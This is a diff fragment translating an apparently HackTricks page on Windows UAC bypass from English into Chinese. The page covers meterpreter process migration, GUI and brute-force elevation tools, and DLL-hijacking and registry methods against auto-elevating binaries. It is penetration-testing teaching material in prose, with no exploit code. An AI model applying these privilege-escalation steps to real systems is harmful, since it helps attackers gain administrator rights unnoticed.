+您可以使用**meterpreter**会话获取。迁移到**Session**值等于**1**的**进程**：
 
 ![](<../../images/image (96).png>)
 
-(_explorer.exe_ should works)
+（_explorer.exe_ 应该可以工作）
 
-### UAC Bypass with GUI
+### 带GUI的UAC绕过
 
-If you have access to a **GUI you can just accept the UAC prompt** when you get it, you don't really need a bypass it. So, getting access to a GUI will allow you to bypass the UAC.
+如果您可以访问**GUI，您只需在出现UAC提示时接受它**，您实际上不需要绕过它。因此，获取对GUI的访问将允许您绕过UAC。
 
-Moreover, if you get a GUI session that someone was using (potentially via RDP) there are **some tools that will be running as administrator** from where you could **run** a **cmd** for example **as admin** directly without being prompted again by UAC like [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). This might be a bit more **stealthy**.
+此外，如果您获得了某人正在使用的GUI会话（可能通过RDP），则有**一些工具将以管理员身份运行**，您可以**直接以管理员身份运行**例如**cmd**而无需再次被UAC提示，如[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更**隐蔽**。
 
-### Noisy brute-force UAC bypass
+### 嘈杂的暴力破解UAC绕过
 
-If you don't care about being noisy you could always **run something like** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) that **ask to elevate permissions until the user does accepts it**.
+如果您不在乎嘈杂，您可以始终**运行类似**[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)的工具，该工具**请求提升权限，直到用户接受它**。
 
-### Your own bypass - Basic UAC bypass methodology
+### 您自己的绕过 - 基本UAC绕过方法
 
-If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking.md).
+如果您查看**UACME**，您会注意到**大多数UAC绕过利用了Dll劫持漏洞**（主要是在_C:\Windows\System32_中写入恶意dll）。[阅读此内容以了解如何找到Dll劫持漏洞](../windows-local-privilege-escalation/dll-hijacking.md)。
 
-1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
-2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
-3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
-   1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
-   2. **IFileOperation**: Windows 10.
-4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
+1. 找到一个会**自动提升**的二进制文件（检查它执行时是否以高完整性级别运行）。
+2. 使用procmon查找可能受到**DLL劫持**影响的“**NAME NOT FOUND**”事件。
+3. 您可能需要在某些**受保护路径**（如C:\Windows\System32）中**写入**DLL，而您没有写入权限。您可以使用以下方法绕过此限制：
+   1. **wusa.exe**：Windows 7、8和8.1。它允许在受保护路径中提取CAB文件的内容（因为此工具是以高完整性级别执行的）。
+   2. **IFileOperation**：Windows 10。
+4. 准备一个**脚本**，将您的DLL复制到受保护路径中并执行易受攻击的自动提升二进制文件。
 
-### Another UAC bypass technique
+### 另一种UAC绕过技术
 
-Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
+该技术是观察一个**自动提升的二进制文件**是否尝试从**注册表**中**读取**要**执行**的**二进制文件**或**命令**的**名称/路径**（如果该二进制文件在**HKCU**中搜索此信息，则更有趣）。
 
 <figure><img src="../../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)轻松构建和**自动化工作流程**，由世界上**最先进**的社区工具提供支持。\
+今天获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-